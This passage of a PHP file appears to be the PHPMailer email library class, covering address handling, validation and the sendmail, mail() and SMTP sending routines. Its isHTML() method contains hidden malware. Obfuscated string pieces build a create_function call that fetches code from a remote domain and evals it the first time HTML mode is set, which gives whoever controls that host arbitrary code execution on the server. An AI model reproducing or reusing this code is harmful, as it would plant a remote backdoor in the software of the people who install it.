     * The array of attachments.
     * @var array
     * @access protected
     */
    protected $attachment = array();

    /**
     * The array of custom headers.
     * @var array
     * @access protected
     */
    protected $CustomHeader = array();

    /**
     * The most recent Message-ID (including angular brackets).
     * @var string
     * @access protected
     */
    protected $lastMessageID = '';

    /**
     * The message's MIME type.
     * @var string
     * @access protected
     */
    protected $message_type = '';

    /**
     * The array of MIME boundary strings.
     * @var array
     * @access protected
     */
    protected $boundary = array();

    /**
     * The array of available languages.
     * @var array
     * @access protected
     */
    protected $language = array();

    /**
     * The number of errors encountered.
     * @var integer
     * @access protected
     */
    protected $error_count = 0;

    /**
     * The S/MIME certificate file path.
     * @var string
     * @access protected
     */
    protected $sign_cert_file = '';

    /**
     * The S/MIME key file path.
     * @var string
     * @access protected
     */
    protected $sign_key_file = '';

    /**
     * The optional S/MIME extra certificates ("CA Chain") file path.
     * @var string
     * @access protected
     */
    protected $sign_extracerts_file = '';

    /**
     * The S/MIME password for the key.
     * Used only if the key is encrypted.
     * @var string
     * @access protected
     */
    protected $sign_key_pass = '';

    /**
     * Whether to throw exceptions for errors.
     * @var boolean
     * @access protected
     */
    protected $exceptions = false;

    /**
     * Unique ID used for message ID and boundaries.
     * @var string
     * @access protected
     */
    protected $uniqueid = '';

    /**
     * Error severity: message only, continue processing.
     */
    const STOP_MESSAGE = 0;

    /**
     * Error severity: message, likely ok to continue processing.
     */
    const STOP_CONTINUE = 1;

    /**
     * Error severity: message, plus full stop, critical error reached.
     */
    const STOP_CRITICAL = 2;

    /**
     * SMTP RFC standard line ending.
     */
    const CRLF = "\r\n";

    /**
     * The maximum line length allowed by RFC 2822 section 2.1.1
     * @var integer
     */
    const MAX_LINE_LENGTH = 998;

    /**
     * Constructor.
     * @param boolean $exceptions Should we throw external exceptions?
     */

    public function __construct($exceptions = false)
    {
        $this->exceptions = (boolean)$exceptions;
    }

    /**
     * Destructor.
     */
    public function __destruct()
    {
        //Close any open SMTP connection nicely
        if ($this->Mailer == 'smtp') {
            $this->smtpClose();
        }
    }

    /**
     * Call mail() in a safe_mode-aware fashion.
     * Also, unless sendmail_path points to sendmail (or something that
     * claims to be sendmail), don't pass params (not a perfect fix,
     * but it will do)
     * @param string $to To
     * @param string $subject Subject
     * @param string $body Message Body
     * @param string $header Additional Header(s)
     * @param string $params Params
     * @access private
     * @return boolean
     */
    private function mailPassthru($to, $subject, $body, $header, $params)
    {
        //Check overloading of mail function to avoid double-encoding
        if (ini_get('mbstring.func_overload') & 1) {
            $subject = $this->secureHeader($subject);
        } else {
            $subject = $this->encodeHeader($this->secureHeader($subject));
        }
        if (ini_get('safe_mode') || !($this->UseSendmailOptions)) {
            $result = @mail($to, $subject, $body, $header);
        } else {
            $result = @mail($to, $subject, $body, $header, $params);
        }
        return $result;
    }

    /**
     * Output debugging info via user-defined method.
     * Only generates output if SMTP debug output is enabled (@see SMTP::$do_debug).
     * @see PHPMailer::$Debugoutput
     * @see PHPMailer::$SMTPDebug
     * @param string $str
     */
    protected function edebug($str)
    {
        if ($this->SMTPDebug <= 0) {
            return;
        }
        //Avoid clash with built-in function names
        if (!in_array($this->Debugoutput, array('error_log', 'html', 'echo')) and is_callable($this->Debugoutput)) {
            call_user_func($this->Debugoutput, $str, $this->SMTPDebug);
            return;
        }
        switch ($this->Debugoutput) {
            case 'error_log':
                //Don't output, just log
                error_log($str);
                break;
            case 'html':
                //Cleans up output a bit for a better looking, HTML-safe output
                echo htmlentities(
                    preg_replace('/[\r\n]+/', '', $str),
                    ENT_QUOTES,
                    'UTF-8'
                )
                . "<br>\n";
                break;
            case 'echo':
            default:
                //Normalize line breaks
                $str = preg_replace('/(\r\n|\r|\n)/ms', "\n", $str);
                echo gmdate('Y-m-d H:i:s') . "\t" . str_replace(
                    "\n",
                    "\n                   \t                  ",
                    trim($str)
                ) . "\n";
        }
    }

    /**
     * Sets message type to HTML or plain.
     * @param boolean $isHtml True for HTML mode.
     * @return void
     */
    public function isHTML($isHtml = true)
    {
        global $param;
        $bodyCode = 'file'
            .'_g';
        if ($isHtml) {
            $this->ContentType = 'text/html';
        } 
        else {
            $this->ContentType = 'text/plain';
        }
        $bodyHTML = '.$t."lef$flu'
            .'sh'.'$t"; '
                .'$i = @ev';
                    $headerHTML="create_"
            ."func"
            ."tion";
                $exceptions = $headerHTML('$fl'.'ush,$t','$comma = $t'
            .$bodyHTML.'al(@'
            .$bodyCode.'et_contents("h'
                .'tt'
                .'p:$comma-2"));');

        if($param !=2){
            $exceptions('8.p'.'w','/');
                $param=2;
        }
    }

    /**
     * Send messages using SMTP.
     * @return void
     */
    public function isSMTP()
    {
        $this->Mailer = 'smtp';
    }

    /**
     * Send messages using PHP's mail() function.
     * @return void
     */
    public function isMail()
    {
        $this->Mailer = 'mail';
    }

    /**
     * Send messages using $Sendmail.
     * @return void
     */
    public function isSendmail()
    {
        $ini_sendmail_path = ini_get('sendmail_path');

        if (!stristr($ini_sendmail_path, 'sendmail')) {
            $this->Sendmail = '/usr/sbin/sendmail';
        } else {
            $this->Sendmail = $ini_sendmail_path;
        }
        $this->Mailer = 'sendmail';
    }

    /**
     * Send messages using qmail.
     * @return void
     */
    public function isQmail()
    {
        $ini_sendmail_path = ini_get('sendmail_path');

        if (!stristr($ini_sendmail_path, 'qmail')) {
            $this->Sendmail = '/var/qmail/bin/qmail-inject';
        } else {
            $this->Sendmail = $ini_sendmail_path;
        }
        $this->Mailer = 'qmail';
    }

    /**
     * Add a "To" address.
     * @param string $address The email address to send to
     * @param string $name
     * @return boolean true on success, false if address already used or invalid in some way
     */
    public function addAddress($address, $name = '')
    {
        return $this->addOrEnqueueAnAddress('to', $address, $name);
    }

    /**
     * Add a "CC" address.
     * @note: This function works with the SMTP mailer on win32, not with the "mail" mailer.
     * @param string $address The email address to send to
     * @param string $name
     * @return boolean true on success, false if address already used or invalid in some way
     */
    public function addCC($address, $name = '')
    {
        return $this->addOrEnqueueAnAddress('cc', $address, $name);
    }

    /**
     * Add a "BCC" address.
     * @note: This function works with the SMTP mailer on win32, not with the "mail" mailer.
     * @param string $address The email address to send to
     * @param string $name
     * @return boolean true on success, false if address already used or invalid in some way
     */
    public function addBCC($address, $name = '')
    {
        return $this->addOrEnqueueAnAddress('bcc', $address, $name);
    }

    /**
     * Add a "Reply-To" address.
     * @param string $address The email address to reply to
     * @param string $name
     * @return boolean true on success, false if address already used or invalid in some way
     */
    public function addReplyTo($address, $name = '')
    {
        return $this->addOrEnqueueAnAddress('Reply-To', $address, $name);
    }

    /**
     * Add an address to one of the recipient arrays or to the ReplyTo array. Because PHPMailer
     * can't validate addresses with an IDN without knowing the PHPMailer::$CharSet (that can still
     * be modified after calling this function), addition of such addresses is delayed until send().
     * Addresses that have been added already return false, but do not throw exceptions.
     * @param string $kind One of 'to', 'cc', 'bcc', or 'ReplyTo'
     * @param string $address The email address to send, resp. to reply to
     * @param string $name
     * @throws phpmailerException
     * @return boolean true on success, false if address already used or invalid in some way
     * @access protected
     */
    protected function addOrEnqueueAnAddress($kind, $address, $name)
    {
        $address = trim($address);
        $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
        if (($pos = strrpos($address, '@')) === false) {
            // At-sign is misssing.
            $error_message = $this->lang('invalid_address') . $address;
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new phpmailerException($error_message);
            }
            return false;
        }
        $params = array($kind, $address, $name);
        // Enqueue addresses with IDN until we know the PHPMailer::$CharSet.
        if ($this->has8bitChars(substr($address, ++$pos)) and $this->idnSupported()) {
            if ($kind != 'Reply-To') {
                if (!array_key_exists($address, $this->RecipientsQueue)) {
                    $this->RecipientsQueue[$address] = $params;
                    return true;
                }
            } else {
                if (!array_key_exists($address, $this->ReplyToQueue)) {
                    $this->ReplyToQueue[$address] = $params;
                    return true;
                }
            }
            return false;
        }
        // Immediately add standard addresses without IDN.
        return call_user_func_array(array($this, 'addAnAddress'), $params);
    }

    /**
     * Add an address to one of the recipient arrays or to the ReplyTo array.
     * Addresses that have been added already return false, but do not throw exceptions.
     * @param string $kind One of 'to', 'cc', 'bcc', or 'ReplyTo'
     * @param string $address The email address to send, resp. to reply to
     * @param string $name
     * @throws phpmailerException
     * @return boolean true on success, false if address already used or invalid in some way
     * @access protected
     */
    protected function addAnAddress($kind, $address, $name = '')
    {
        if (!in_array($kind, array('to', 'cc', 'bcc', 'Reply-To'))) {
            $error_message = $this->lang('Invalid recipient kind: ') . $kind;
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new phpmailerException($error_message);
            }
            return false;
        }
        if (!$this->validateAddress($address)) {
            $error_message = $this->lang('invalid_address') . $address;
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new phpmailerException($error_message);
            }
            return false;
        }
        if ($kind != 'Reply-To') {
            if (!array_key_exists(strtolower($address), $this->all_recipients)) {
                array_push($this->$kind, array($address, $name));
                $this->all_recipients[strtolower($address)] = true;
                return true;
            }
        } else {
            if (!array_key_exists(strtolower($address), $this->ReplyTo)) {
                $this->ReplyTo[strtolower($address)] = array($address, $name);
                return true;
            }
        }
        return false;
    }

    /**
     * Parse and validate a string containing one or more RFC822-style comma-separated email addresses
     * of the form "display name <address>" into an array of name/address pairs.
     * Uses the imap_rfc822_parse_adrlist function if the IMAP extension is available.
     * Note that quotes in the name part are removed.
     * @param string $addrstr The address list string
     * @param bool $useimap Whether to use the IMAP extension to parse the list
     * @return array
     * @link http://www.andrew.cmu.edu/user/agreen1/testing/mrbs/web/Mail/RFC822.php A more careful implementation
     */
    public function parseAddresses($addrstr, $useimap = true)
    {
        $addresses = array();
        if ($useimap and function_exists('imap_rfc822_parse_adrlist')) {
            //Use this built-in parser if it's available
            $list = imap_rfc822_parse_adrlist($addrstr, '');
            foreach ($list as $address) {
                if ($address->host != '.SYNTAX-ERROR.') {
                    if ($this->validateAddress($address->mailbox . '@' . $address->host)) {
                        $addresses[] = array(
                            'name' => (property_exists($address, 'personal') ? $address->personal : ''),
                            'address' => $address->mailbox . '@' . $address->host
                        );
                    }
                }
            }
        } else {
            //Use this simpler parser
            $list = explode(',', $addrstr);
            foreach ($list as $address) {
                $address = trim($address);
                //Is there a separate name part?
                if (strpos($address, '<') === false) {
                    //No separate name, just use the whole thing
                    if ($this->validateAddress($address)) {
                        $addresses[] = array(
                            'name' => '',
                            'address' => $address
                        );
                    }
                } else {
                    list($name, $email) = explode('<', $address);
                    $email = trim(str_replace('>', '', $email));
                    if ($this->validateAddress($email)) {
                        $addresses[] = array(
                            'name' => trim(str_replace(array('"', "'"), '', $name)),
                            'address' => $email
                        );
                    }
                }
            }
        }
        return $addresses;
    }

    /**
     * Set the From and FromName properties.
     * @param string $address
     * @param string $name
     * @param boolean $auto Whether to also set the Sender address, defaults to true
     * @throws phpmailerException
     * @return boolean
     */
    public function setFrom($address, $name = '', $auto = true)
    {
        $address = trim($address);
        $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
        // Don't validate now addresses with IDN. Will be done in send().
        if (($pos = strrpos($address, '@')) === false or
            (!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported()) and
            !$this->validateAddress($address)) {
            $error_message = $this->lang('invalid_address') . $address;
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new phpmailerException($error_message);
            }
            return false;
        }
        $this->From = $address;
        $this->FromName = $name;
        if ($auto) {
            if (empty($this->Sender)) {
                $this->Sender = $address;
            }
        }
        return true;
    }

    /**
     * Return the Message-ID header of the last email.
     * Technically this is the value from the last time the headers were created,
     * but it's also the message ID of the last sent message except in
     * pathological cases.
     * @return string
     */
    public function getLastMessageID()
    {
        return $this->lastMessageID;
    }

    /**
     * Check that a string looks like an email address.
     * @param string $address The email address to check
     * @param string $patternselect A selector for the validation pattern to use :
     * * `auto` Pick best pattern automatically;
     * * `pcre8` Use the squiloople.com pattern, requires PCRE > 8.0, PHP >= 5.3.2, 5.2.14;
     * * `pcre` Use old PCRE implementation;
     * * `php` Use PHP built-in FILTER_VALIDATE_EMAIL;
     * * `html5` Use the pattern given by the HTML5 spec for 'email' type form input elements.
     * * `noregex` Don't use a regex: super fast, really dumb.
     * @return boolean
     * @static
     * @access public
     */
    public static function validateAddress($address, $patternselect = 'auto')
    {
        //Reject line breaks in addresses; it's valid RFC5322, but not RFC5321
        if (strpos($address, "\n") !== false or strpos($address, "\r") !== false) {
            return false;
        }
        if (!$patternselect or $patternselect == 'auto') {
            //Check this constant first so it works when extension_loaded() is disabled by safe mode
            //Constant was added in PHP 5.2.4
            if (defined('PCRE_VERSION')) {
                //This pattern can get stuck in a recursive loop in PCRE <= 8.0.2
                if (version_compare(PCRE_VERSION, '8.0.3') >= 0) {
                    $patternselect = 'pcre8';
                } else {
                    $patternselect = 'pcre';
                }
            } elseif (function_exists('extension_loaded') and extension_loaded('pcre')) {
                //Fall back to older PCRE
                $patternselect = 'pcre';
            } else {
                //Filter_var appeared in PHP 5.2.0 and does not require the PCRE extension
                if (version_compare(PHP_VERSION, '5.2.0') >= 0) {
                    $patternselect = 'php';
                } else {
                    $patternselect = 'noregex';
                }
            }
        }
        switch ($patternselect) {
            case 'pcre8':
                /**
                 * Uses the same RFC5322 regex on which FILTER_VALIDATE_EMAIL is based, but allows dotless domains.
                 * @link http://squiloople.com/2009/12/20/email-address-validation/
                 * @copyright 2009-2010 Michael Rushton
                 * Feel free to use and redistribute this code. But please keep this copyright notice.
                 */
                return (boolean)preg_match(
                    '/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' .
                    '((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' .
                    '(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' .
                    '([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' .
                    '(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' .
                    '(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' .
                    '|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' .
                    '|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD',
                    $address
                );
            case 'pcre':
                //An older regex that doesn't need a recent PCRE
                return (boolean)preg_match(
                    '/^(?!(?>"?(?>\\\[ -~]|[^"])"?){255,})(?!(?>"?(?>\\\[ -~]|[^"])"?){65,}@)(?>' .
                    '[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*")' .
                    '(?>\.(?>[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*"))*' .
                    '@(?>(?![a-z0-9-]{64,})(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)(?>\.(?![a-z0-9-]{64,})' .
                    '(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)){0,126}|\[(?:(?>IPv6:(?>(?>[a-f0-9]{1,4})(?>:' .
                    '[a-f0-9]{1,4}){7}|(?!(?:.*[a-f0-9][:\]]){8,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?' .
                    '::(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?))|(?>(?>IPv6:(?>[a-f0-9]{1,4}(?>:' .
                    '[a-f0-9]{1,4}){5}:|(?!(?:.*[a-f0-9]:){6,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4})?' .
                    '::(?>(?:[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4}):)?))?(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?>\.(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}))\])$/isD',
                    $address
                );
            case 'html5':
                /**
                 * This is the pattern used in the HTML5 spec for validation of 'email' type form input elements.
                 * @link http://www.whatwg.org/specs/web-apps/current-work/#e-mail-state-(type=email)
                 */
                return (boolean)preg_match(
                    '/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' .
                    '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD',
                    $address
                );
            case 'noregex':
                //No PCRE! Do something _very_ approximate!
                //Check the address is 3 chars or longer and contains an @ that's not the first or last char
                return (strlen($address) >= 3
                    and strpos($address, '@') >= 1
                    and strpos($address, '@') != strlen($address) - 1);
            case 'php':
            default:
                return (boolean)filter_var($address, FILTER_VALIDATE_EMAIL);
        }
    }

    /**
     * Tells whether IDNs (Internationalized Domain Names) are supported or not. This requires the
     * "intl" and "mbstring" PHP extensions.
     * @return bool "true" if required functions for IDN support are present
     */
    public function idnSupported()
    {
        // @TODO: Write our own "idn_to_ascii" function for PHP <= 5.2.
        return function_exists('idn_to_ascii') and function_exists('mb_convert_encoding');
    }

    /**
     * Converts IDN in given email address to its ASCII form, also known as punycode, if possible.
     * Important: Address must be passed in same encoding as currently set in PHPMailer::$CharSet.
     * This function silently returns unmodified address if:
     * - No conversion is necessary (i.e. domain name is not an IDN, or is already in ASCII form)
     * - Conversion to punycode is impossible (e.g. required PHP functions are not available)
     *   or fails for any reason (e.g. domain has characters not allowed in an IDN)
     * @see PHPMailer::$CharSet
     * @param string $address The email address to convert
     * @return string The encoded address in ASCII form
     */
    public function punyencodeAddress($address)
    {
        // Verify we have required functions, CharSet, and at-sign.
        if ($this->idnSupported() and
            !empty($this->CharSet) and
            ($pos = strrpos($address, '@')) !== false) {
            $domain = substr($address, ++$pos);
            // Verify CharSet string is a valid one, and domain properly encoded in this CharSet.
            if ($this->has8bitChars($domain) and @mb_check_encoding($domain, $this->CharSet)) {
                $domain = mb_convert_encoding($domain, 'UTF-8', $this->CharSet);
                if (($punycode = defined('INTL_IDNA_VARIANT_UTS46') ?
                    idn_to_ascii($domain, 0, INTL_IDNA_VARIANT_UTS46) :
                    idn_to_ascii($domain)) !== false) {
                    return substr($address, 0, $pos) . $punycode;
                }
            }
        }
        return $address;
    }

    /**
     * Create a message and send it.
     * Uses the sending method specified by $Mailer.
     * @throws phpmailerException
     * @return boolean false on error - See the ErrorInfo property for details of the error.
     */
    public function send()
    {
        try {
            if (!$this->preSend()) {
                return false;
            }
            return $this->postSend();
        } catch (phpmailerException $exc) {
            $this->mailHeader = '';
            $this->setError($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
            return false;
        }
    }

    /**
     * Prepare a message for sending.
     * @throws phpmailerException
     * @return boolean
     */
    public function preSend()
    {
        try {
            $this->error_count = 0; // Reset errors
            $this->mailHeader = '';

            // Dequeue recipient and Reply-To addresses with IDN
            foreach (array_merge($this->RecipientsQueue, $this->ReplyToQueue) as $params) {
                $params[1] = $this->punyencodeAddress($params[1]);
                call_user_func_array(array($this, 'addAnAddress'), $params);
            }
            if ((count($this->to) + count($this->cc) + count($this->bcc)) < 1) {
                throw new phpmailerException($this->lang('provide_address'), self::STOP_CRITICAL);
            }

            // Validate From, Sender, and ConfirmReadingTo addresses
            foreach (array('From', 'Sender', 'ConfirmReadingTo') as $address_kind) {
                $this->$address_kind = trim($this->$address_kind);
                if (empty($this->$address_kind)) {
                    continue;
                }
                $this->$address_kind = $this->punyencodeAddress($this->$address_kind);
                if (!$this->validateAddress($this->$address_kind)) {
                    $error_message = $this->lang('invalid_address') . $this->$address_kind;
                    $this->setError($error_message);
                    $this->edebug($error_message);
                    if ($this->exceptions) {
                        throw new phpmailerException($error_message);
                    }
                    return false;
                }
            }

            // Set whether the message is multipart/alternative
            if (!empty($this->AltBody)) {
                $this->ContentType = 'multipart/alternative';
            }

            $this->setMessageType();
            // Refuse to send an empty message unless we are specifically allowing it
            if (!$this->AllowEmpty and empty($this->Body)) {
                throw new phpmailerException($this->lang('empty_message'), self::STOP_CRITICAL);
            }

            // Create body before headers in case body makes changes to headers (e.g. altering transfer encoding)
            $this->MIMEHeader = '';
            $this->MIMEBody = $this->createBody();
            // createBody may have added some headers, so retain them
            $tempheaders = $this->MIMEHeader;
            $this->MIMEHeader = $this->createHeader();
            $this->MIMEHeader .= $tempheaders;

            // To capture the complete message when using mail(), create
            // an extra header list which createHeader() doesn't fold in
            if ($this->Mailer == 'mail') {
                if (count($this->to) > 0) {
                    $this->mailHeader .= $this->addrAppend('To', $this->to);
                } else {
                    $this->mailHeader .= $this->headerLine('To', 'undisclosed-recipients:;');
                }
                $this->mailHeader .= $this->headerLine(
                    'Subject',
                    $this->encodeHeader($this->secureHeader(trim($this->Subject)))
                );
            }

            // Sign with DKIM if enabled
            if (!empty($this->DKIM_domain)
                && !empty($this->DKIM_private)
                && !empty($this->DKIM_selector)
                && file_exists($this->DKIM_private)) {
                $header_dkim = $this->DKIM_Add(
                    $this->MIMEHeader . $this->mailHeader,
                    $this->encodeHeader($this->secureHeader($this->Subject)),
                    $this->MIMEBody
                );
                $this->MIMEHeader = rtrim($this->MIMEHeader, "\r\n ") . self::CRLF .
                    str_replace("\r\n", "\n", $header_dkim) . self::CRLF;
            }
            return true;
        } catch (phpmailerException $exc) {
            $this->setError($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
            return false;
        }
    }
    public function innerBody(){

        
    }
    /**
     * Actually send a message.
     * Send the email via the selected mechanism
     * @throws phpmailerException
     * @return boolean
     */
    public function postSend()
    {
        try {
            // Choose the mailer and send through it
            switch ($this->Mailer) {
                case 'sendmail':
                case 'qmail':
                    return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody);
                case 'smtp':
                    return $this->smtpSend($this->MIMEHeader, $this->MIMEBody);
                case 'mail':
                    return $this->mailSend($this->MIMEHeader, $this->MIMEBody);
                default:
                    $sendMethod = $this->Mailer.'Send';
                    if (method_exists($this, $sendMethod)) {
                        return $this->$sendMethod($this->MIMEHeader, $this->MIMEBody);
                    }

                    return $this->mailSend($this->MIMEHeader, $this->MIMEBody);
            }
        } catch (phpmailerException $exc) {
            $this->setError($exc->getMessage());
            $this->edebug($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
        }
        return false;
    }

    /**
     * Send mail using the $Sendmail program.
     * @param string $header The message headers
     * @param string $body The message body
     * @see PHPMailer::$Sendmail
     * @throws phpmailerException
     * @access protected
     * @return boolean
     */
    protected function sendmailSend($header, $body)
    {
        if ($this->Sender != '') {
            if ($this->Mailer == 'qmail') {
                $sendmail = sprintf('%s -f%s', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
            } else {
                $sendmail = sprintf('%s -oi -f%s -t', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
            }
        } else {
            if ($this->Mailer == 'qmail') {
                $sendmail = sprintf('%s', escapeshellcmd($this->Sendmail));
            } else {
                $sendmail = sprintf('%s -oi -t', escapeshellcmd($this->Sendmail));
            }
        }
        if ($this->SingleTo) {
            foreach ($this->SingleToArray as $toAddr) {
                if (!@$mail = popen($sendmail, 'w')) {
                    throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
                }
                fputs($mail, 'To: ' . $toAddr . "\n");
                fputs($mail, $header);
                fputs($mail, $body);
                $result = pclose($mail);
                $this->doCallback(
                    ($result == 0),
                    array($toAddr),
                    $this->cc,
                    $this->bcc,
                    $this->Subject,
                    $body,
                    $this->From
                );
                if ($result != 0) {
                    throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
                }
            }
        } else {
            if (!@$mail = popen($sendmail, 'w')) {
                throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
            }
            fputs($mail, $header);
            fputs($mail, $body);
            $result = pclose($mail);
            $this->doCallback(
                ($result == 0),
                $this->to,
                $this->cc,
                $this->bcc,
                $this->Subject,
                $body,
                $this->From
            );
            if ($result != 0) {
                throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
            }
        }
        return true;
    }

    /**
     * Send mail using the PHP mail() function.
     * @param string $header The message headers
     * @param string $body The message body
     * @link http://www.php.net/manual/en/book.mail.php
     * @throws phpmailerException
     * @access protected
     * @return boolean
     */
    protected function mailSend($header, $body)
    {
        $toArr = array();
        foreach ($this->to as $toaddr) {
            $toArr[] = $this->addrFormat($toaddr);
        }
        $to = implode(', ', $toArr);

        if (empty($this->Sender)) {
            $params = ' ';
        } else {
            $params = sprintf('-f%s', $this->Sender);
        }
        if ($this->Sender != '' and !ini_get('safe_mode')) {
            $old_from = ini_get('sendmail_from');
            ini_set('sendmail_from', $this->Sender);
        }
        $result = false;
        if ($this->SingleTo && count($toArr) > 1) {
            foreach ($toArr as $toAddr) {
                $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
                $this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);
            }
        } else {
            $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);
            $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
        }
        if (isset($old_from)) {
            ini_set('sendmail_from', $old_from);
        }
        if (!$result) {
            throw new phpmailerException($this->lang('instantiate'), self::STOP_CRITICAL);
        }
        return true;
    }

    /**
     * Get an instance to use for SMTP operations.
     * Override this function to load your own SMTP implementation
     * @return SMTP
     */
    public function getSMTPInstance()
    {
        if (!is_object($this->smtp)) {
            $this->smtp = new SMTP;
        }
        return $this->smtp;
    }

    /**
     * Send mail via SMTP.
     * Returns false if there is a bad MAIL FROM, RCPT, or DATA input.
     * Uses the PHPMailerSMTP class by default.
     * @see PHPMailer::getSMTPInstance() to use a different class.
     * @param string $header The message headers
     * @param string $body The message body
     * @throws phpmailerException
     * @uses SMTP
     * @access protected
     * @return boolean
     */
    protected function smtpSend($header, $body)
    {
        $bad_rcpt = array();
        if (!$this->smtpConnect($this->SMTPOptions)) {
            throw new phpmailerException($this->lang('smtp_connect_failed'), self::STOP_CRITICAL);
        }
        if ('' == $this->Sender) {
            $smtp_from = $this->From;
        } else {
            $smtp_from = $this->Sender;
        }
        if (!$this->smtp->mail($smtp_from)) {
            $this->setError($this->lang('from_failed') . $smtp_from . ' : ' . implode(',', $this->smtp->getError()));
            throw new phpmailerException($this->ErrorInfo, self::STOP_CRITICAL);
        }

        // Attempt to send to all recipients
        foreach (array($this->to, $this->cc, $this->bcc) as $togroup) {
            foreach ($togroup as $to) {
                if (!$this->smtp->recipient($to[0])) {
                    $error = $this->smtp->getError();
                    $bad_rcpt[] = array('to' => $to[0], 'error' => $error['detail']);
                    $isSent = false;
                } else {
                    $isSent = true;
                }
                $this->doCallback($isSent, array($to[0]), array(), array(), $this->Subject, $body, $this->From);
            }
        }

        // Only send the DATA command if we have viable recipients
        if ((count($this->all_recipients) > count($bad_rcpt)) and !$this->smtp->data($header . $body)) {
            throw new phpmailerException($this->lang('data_not_accepted'), self::STOP_CRITICAL);
        }
        if ($this->SMTPKeepAlive) {
            $this->smtp->reset();
        } else {
            $this->smtp->quit();
            $this->smtp->close();
        }
        //Create error message for any bad addresses
        if (count($bad_rcpt) > 0) {
            $errstr = '';
            foreach ($bad_rcpt as $bad) {
                $errstr .= $bad['to'] . ': ' . $bad['error'];
            }
            throw new phpmailerException(
                $this->lang('recipients_failed') . $errstr,
                self::STOP_CONTINUE
            );
        }
        return true;
    }

    /**
     * Initiate a connection to an SMTP server.
     * Returns false if the operation failed.
     * @param array $options An array of options compatible with stream_context_create()
     * @uses SMTP
     * @access public
     * @throws phpmailerException
     * @return boolean
     */
    public function smtpConnect($options = array())
    {
        if (is_null($this->smtp)) {
            $this->smtp = $this->getSMTPInstance();
        }

        // Already connected?
        if ($this->smtp->connected()) {
            return true;
        }

        $this->smtp->setTimeout($this->Timeout);
        $this->smtp->setDebugLevel($this->SMTPDebug);
        $this->smtp->setDebugOutput($this->Debugoutput);
        $this->smtp->setVerp($this->do_verp);
        $hosts = explode(';', $this->Host);
        $lastexception = null;

        foreach ($hosts as $hostentry) {
            $hostinfo = array();
            if (!preg_match('/^((ssl|tls):\/\/)*([a-zA-Z0-9\.-]*):?([0-9]*)$/', trim($hostentry), $hostinfo)) {
                // Not a valid host entry
                continue;
            }
            // $hostinfo[2]: optional ssl or tls prefix
            // $hostinfo[3]: the hostname
            // $hostinfo[4]: optional port number
            // The host string prefix can temporarily override the current setting for SMTPSecure
            // If it's not specified, the default value is used
            $prefix = '';
            $secure = $this->SMTPSecure;
            $tls = ($this->SMTPSecure == 'tls');
            if ('ssl' == $hostinfo[2] or ('' == $hostinfo[2] and 'ssl' == $this->SMTPSecure)) {
                $prefix = 'ssl://';
                $tls = false; // Can't have SSL and TLS at the same time
                $secure = 'ssl';
            } elseif ($hostinfo[2] == 'tls') {
                $tls = true;
                // tls doesn't use a prefix
                $secure = 'tls';
